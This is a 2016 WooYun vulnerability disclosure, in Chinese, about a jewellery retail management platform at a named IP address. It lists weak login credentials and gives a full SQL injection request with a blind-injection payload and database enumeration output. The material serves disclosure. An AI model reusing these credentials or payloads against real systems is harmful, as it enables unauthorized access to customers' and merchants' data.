当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190327

漏洞标题:世纪万佳珠宝平台漏洞泄漏百万订单/数万用户帐号信息/查看报表/管理金价等

相关厂商:深圳市世纪万佳科技有限公司

漏洞作者: 保护伞

提交时间:2016-03-29 16:49

修复时间:2016-05-13 16:50

公开时间:2016-05-13 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

主站:http://www.gold-shop.cn/
管理平台:http://202.104.113.190/
部分用户:
11	123456
12	123456
99	99
111	111


1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


7.jpg


注入:POST http://202.104.113.190/distribution/ListVRetailDetail.do HTTP/1.1
Host: 202.104.113.190
Connection: keep-alive
Content-Length: 440
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://202.104.113.190
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://202.104.113.190/distribution/ListVRetailDetail.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=7BD224DCACF34ACE97B88510890241F5
opMode=list&navMode=L&pageId=1&orderBy=&order=&isFirst=N&siteId=&retailType=&startDate=2016-03-25&endDate=2016-03-25&retailOrderNo=123&goodsBarcode=&customerName=&goodsCategoryId=&goodsTypeId=&stoneId=&startGoldWeight=&endGoldWeight=&startLabelPrice=&endLabelPrice=&startStonesWeight=&endStonesWeight=&orderStatus=&stonePureId=&stoneToneId=&stoneCircle=&companyNo=&factoryStyle=&supplierId=&staffId=&pageSize=15&pageNumber=0
Parameter: retailOrderNo (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: opMode=list&navMode=L&pageId=1&orderBy=&order=&isFirst=N&siteId=&retailType=&startDate=2016-03-02&endDate=2016-03-03&retailOrderNo=123 AND 7109=7109 AND 'EgRb'='EgRb&goodsBarcode=&customerName=&goodsCategoryId=&goodsTypeId=&stoneId=&startGoldWeight=&endGoldWeight=&startLabelPrice=&endLabelPrice=&startStonesWeight=&endStonesWeight=&orderStatus=&stonePureId=&stoneToneId=&stoneCircle=&companyNo=&factoryStyle=&supplierId=&retailType=4&retailType=1&retailType=1&retailType=1&retailType=4&retailType=1&retailType=1&retailType=1&retailType=1&pageSize=15&pageNumber=1
    Vector: AND [INFERENCE]
---
back-end DBMS: MySQL 5
available databases [8]:
[*] information_schema
[*] jpsim
[*] jpsim2
[*] mysql
[*] performance_schema
[*] sakila
[*] test
[*] world
Database: jpsim
[213 tables]
+------------------------------------+
| audit_login_out                    |
| audit_trail                        |
| basic_brand                        |
| basic_gold_stone                   |
| basic_goods_category               |
| basic_goods_diamond_color          |
| basic_goods_diamond_element        |
| basic_goods_diamond_process        |
| basic_goods_diamond_pure           |
| basic_goods_diamond_shape          |
| basic_goods_diamond_tone           |
| basic_goods_type                   |
| basic_suppliers                    |
| basic_warehouse                    |
| basic_weight                       |
| check_goods_init12                 |
| check_goods_init122                |
| check_goods_init159                |
| check_goods_init169                |
| check_goods_init184                |
| check_goods_init190                |
| check_goods_init196                |
| check_goods_init199                |
| check_goods_init2                  |
| check_goods_init234                |
| check_goods_init244                |
| check_goods_init261                |
| check_goods_init280                |
| check_goods_init283                |
| check_goods_init288                |
| check_goods_init292                |
| check_goods_init296                |
| check_goods_init30                 |
| check_goods_init307                |
| check_goods_init333                |
| check_goods_init356                |
| check_goods_init361                |
| check_goods_init366                |
| check_goods_init368                |
| check_goods_init378                |
| check_goods_init387                |
| check_goods_init39                 |
| check_goods_init433                |
| check_goods_init436                |
| check_goods_init440                |
| check_goods_init456                |
| check_goods_init463                |
| check_goods_init466                |
| check_goods_init469                |
| check_goods_init477                |
| check_goods_init483                |
| check_goods_init491                |
| check_goods_init505                |
| check_goods_init508                |
| check_goods_init511                |
| check_goods_init515                |
| check_goods_init519                |
| check_goods_init571                |
| check_goods_init574                |
| check_goods_init586                |
| check_goods_init589                |
| check_goods_init595                |
| check_goods_init609                |
| check_goods_init612                |
| check_goods_init64                 |
| check_goods_init94                 |
| check_goods_order                  |
| checkgoods_order_detail            |
| checkgoods_order_result            |
| coefficient_message                |
| coefficient_message_detail         |
| com_organization                   |
| company_goods_seq                  |
| company_message_history            |
| company_message_info               |
| company_param                      |
| consumption_records                |
| consumption_score_records          |
| cost_change_order                  |
| cost_change_order_detail           |
| current_coefficient                |
| decoration_inbound                 |
| decoration_message                 |
| decoration_req_order               |
| decoration_req_order_detail        |
| decoration_warehouse_goods         |
| diamond_price                      |
| dms_document                       |
| dms_mtm_company_document           |
| form_element                       |
| goods                              |
| goods_life_cycle                   |
| inlayin_bound_order                |
| inlayin_bound_order_detail         |
| inventory_sheet_order              |
| inventory_sheet_order_detail       |
| label_price_order                  |
| label_price_order_detail           |
| maintain_handle                    |
| maintain_order                     |
| maintain_order_detail              |
| material_info                      |
| material_recyling_order            |
| material_recyling_order_detail     |
| material_req_order                 |
| material_req_order_detail          |
| material_warehouse                 |
| member_info                        |
| member_info_adjust                 |
| member_money_order                 |
| member_type                        |
| mtm_company_checkgoods             |
| mtm_company_form_element           |
| mtm_company_rule                   |
| mtm_company_sysfunction            |
| mtm_staff_site                     |
| mtm_staff_staff                    |
| mtm_user_record_user_role          |
| mtm_user_role_fun_element          |
| mtm_warehouse_site                 |
| no_for_supervision_rule            |
| org_basic_message                  |
| org_staff                          |
| out_bound_detail                   |
| out_ound_order                     |
| personal_home_preference           |
| present_inbound                    |
| present_message                    |
| present_req_order                  |
| present_req_order_detail           |
| present_warehouse_goods            |
| price_markup                       |
| price_markup_detail                |
| price_markup_now                   |
| price_weighted_coefficient         |
| price_weighted_coefficient_history |
| requisition_order                  |
| requisition_order_detail           |
| retail_amount_set                  |
| retail_order                       |
| retail_order_detail                |
| retail_order_no_rule               |
| return_goods_order                 |
| return_goods_order_detail          |
| return_material_detail             |
| score_set                          |
| shift_order                        |
| shift_order_detail                 |
| site_gold_price                    |
| site_ratio                         |
| site_ratio_history                 |
| sms_send                           |
| sys_delete_reference               |
| sys_enums                          |
| sys_function                       |
| sys_no_rule                        |
| sys_no_rule_coeff01                |
| sys_no_rule_db01                   |
| sys_no_rule_decoration01           |
| sys_no_rule_diamond01              |
| sys_no_rule_dj01                   |
| sys_no_rule_in01                   |
| sys_no_rule_jlreq01                |
| sys_no_rule_member01               |
| sys_no_rule_money01                |
| sys_no_rule_mtod01                 |
| sys_no_rule_out01                  |
| sys_no_rule_pd01                   |
| sys_no_rule_present01              |
| sys_no_rule_ro01                   |
| sys_no_rule_ro02                   |
| sys_no_rule_sftod01                |
| sys_no_rule_sj01                   |
| sys_no_rule_supervision01          |
| sys_no_rule_tj01                   |
| sys_no_rule_xq01                   |
| sys_parameter                      |
| sys_table_key_generator            |
| user_record                        |
| user_role                          |
| user_role_permission               |
| v_checkgoods_detail                |
| v_coeffice_stone                   |
| v_coefficient                      |
| v_company_function_element         |
| v_costchangeoderdetailquery        |
| v_goodcategorybyretail             |
| v_goodsbymultiquery                |
| v_goodsforlabelprice               |
| v_goodsmonthcount                  |
| v_inlayin_history                  |
| v_inlayinboundorder_detail         |
| v_inventory_quality                |
| v_labelprice_goods_print           |
| v_labelpricebygoldenin             |
| v_material_requsition_history      |
| v_material_warehouse               |
| v_orgstaffanduser                  |
| v_orgstaffbysite                   |
| v_outound_history                  |
| v_report_dayretailorder            |
| v_report_present                   |
| v_report_profit                    |
| v_report_totalretailorder          |
| v_report_warehouse                 |
| v_requistion_history               |
| v_retail_detail                    |
| v_retail_detail_count              |
| v_role_function_element            |
| v_sitesidbystaffid                 |
| v_warehousegoods                   |
| v_warehousegoods_road              |
| warehouse_goods                    |
+------------------------------------+
Database: jpsim
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| member_info | 36719   |
+-------------+---------+
Database: jpsim
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| inlayin_bound_order_detail | 1053628 |
+----------------------------+---------+

漏洞证明:

6.jpg


8.jpg


修复方案:

rt

版权声明:转载请注明来源 保护伞@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)